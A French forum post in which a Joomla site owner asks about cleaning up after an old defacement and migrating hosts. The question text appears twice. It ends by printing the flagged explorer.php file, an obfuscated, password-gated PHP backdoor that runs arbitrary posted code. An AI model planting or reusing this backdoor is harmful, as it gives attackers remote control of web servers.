Tweet
Bonjour,
Le contexte
J'ai développé un premier site Joomla en 2009 - sur une version 1.1 - et depuis le site a évolué ; j'ai eu une attaque (defacing de site) en 2013 et à ce moment là, j'ai essayé de nettoyer le site et tout semble bien se passer.
Nous souhaitons changer d'hébergeur et nous faisons des tests chez 1 and 1 en utilisant la méthode classique : avec Akeeba backup, je fais une sauvegarde du site chez mon ancien que je ré installe chez 1&1. Leur équipe de sécurité a détecté un fichier php bizarre - explorer.php . J'ai trouvé une trace de ce hack sur le site Joomla.org dans un post daté de 2014 ...
Mon problème
Je crois mon site globalement sain : j'applique régulièrement toutes les mises à jour, je le scanne régulièrement avec des outils, je suis les bonnes pratiques. Je pense que ce fichier php est une scorie très ancienne ; je l'ai supprimé et tout semble bien se passer (j'ai installé une copie du site sur mon PC et j'ai scanné l'ensemble des fichiers du site à la recherche d'un appel éventuel à ce programme, je n'ai rien trouvé)
Question 1 :
Est-ce que ces mesures sont suffisantes ?
Question 2 :
J'ai l'impression que les mises à jour successives de Joomla ne font que remplacer les anciennes versions de fichier par des nouvelles et ajouter de nouveaux fichiers mais qu'il n'y a pas toujours de suppression de fichiers qui ne servent plus à rien.
Y-a t'il un moyen de vérifier qu'il n'y a pas de vieux fichiers inutiles - des scories - sur mon site ?
Question 3 :
Si je devais refaire une nouvelle version de mon site en repartant de zéro, c'est à dire installer la dernière version de Joomla puis reprendre tous les contenus, existe t'il des outils pour reprendre une partie des données de l'ancien site ?
Ma question porte sur les données qui représentent un volume important :
- existe t'il un outil pour reprendre tous les articles et les données associées comme les catégories ?
- existe t'il une méthode simple pour reprendre tous les menus ?
Merci pour votre réponse
Le contenu du fichier suspect :
Le site concerné : https://www.libre-association-freudienne.org
Le contexte
J'ai développé un premier site Joomla en 2009 - sur une version 1.1 - et depuis le site a évolué ; j'ai eu une attaque (defacing de site) en 2013 et à ce moment là, j'ai essayé de nettoyer le site et tout semble bien se passer.
Nous souhaitons changer d'hébergeur et nous faisons des tests chez 1 and 1 en utilisant la méthode classique : avec Akeeba backup, je fais une sauvegarde du site chez mon ancien que je ré installe chez 1&1. Leur équipe de sécurité a détecté un fichier php bizarre - explorer.php . J'ai trouvé une trace de ce hack sur le site Joomla.org dans un post daté de 2014 ...
Mon problème
Je crois mon site globalement sain : j'applique régulièrement toutes les mises à jour, je le scanne régulièrement avec des outils, je suis les bonnes pratiques. Je pense que ce fichier php est une scorie très ancienne ; je l'ai supprimé et tout semble bien se passer (j'ai installé une copie du site sur mon PC et j'ai scanné l'ensemble des fichiers du site à la recherche d'un appel éventuel à ce programme, je n'ai rien trouvé)
Question 1 :
Est-ce que ces mesures sont suffisantes ?
Question 2 :
J'ai l'impression que les mises à jour successives de Joomla ne font que remplacer les anciennes versions de fichier par des nouvelles et ajouter de nouveaux fichiers mais qu'il n'y a pas toujours de suppression de fichiers qui ne servent plus à rien.
Y-a t'il un moyen de vérifier qu'il n'y a pas de vieux fichiers inutiles - des scories - sur mon site ?
Question 3 :
Si je devais refaire une nouvelle version de mon site en repartant de zéro, c'est à dire installer la dernière version de Joomla puis reprendre tous les contenus, existe t'il des outils pour reprendre une partie des données de l'ancien site ?
Ma question porte sur les données qui représentent un volume important :
- existe t'il un outil pour reprendre tous les articles et les données associées comme les catégories ?
- existe t'il une méthode simple pour reprendre tous les menus ?
Merci pour votre réponse
Le contenu du fichier suspect :
Code:
<?php if (md5($_POST["password"]) == "084cf1c32f92386cc2ec14c956e07fdc") { preg_replace("\043\056\052\043\145", "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050'" . $_POST["code"] . "'\051\051\073", ""); } ?>
Commentaire